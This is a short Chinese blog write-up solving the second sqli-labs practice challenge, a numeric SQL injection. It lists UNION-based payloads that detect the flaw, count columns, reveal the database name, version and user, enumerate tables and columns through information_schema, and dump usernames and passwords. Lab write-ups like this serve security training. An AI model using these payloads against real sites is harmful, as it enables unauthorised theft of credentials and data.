SQL注入sqli_labs靶场第二题

解题思路与第一题相同

?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

联合查询:

猜解列名数量:3

?id=1 order by 4

判断回显点

?id=-1 union select 1,2,3

爆库、版本号、权限

?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+

爆表、爆列

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1 union select 1,2,(select group_concat(username,password))from users

相关推荐
帧栈2 小时前
开发避坑指南(29):微信昵称特殊字符存储异常修复方案
java·mysql
瓜酷月..3 小时前
MySQL的高可用+MHA
数据库·mysql
苹果醋36 小时前
Java并发编程-Java内存模型(JMM)
java·运维·spring boot·mysql·nginx
翔云1234567 小时前
Python 中 SQLAlchemy 和 MySQLdb 的关系
数据库·python·mysql
做一个AC梦9 小时前
MiniOB环境部署开发(使用Docker)
数据库·sql·miniob·ob·海扬数据库
叁沐13 小时前
MySQL 27 主库出问题了,从库怎么办?
mysql
l1t16 小时前
分析xml标签属性和压缩级别对xlsx文件读取解析的影响
xml·开发语言·python·sql·duckdb
DONG91317 小时前
Redis内存架构解析与性能优化实战
数据库·redis·sql·database
源图客1 天前
Spark读取MySQL数据库表
数据库·mysql·spark
xiucai_cs1 天前
MySQL深分页慢问题及性能优化
数据库·mysql·性能优化·深分页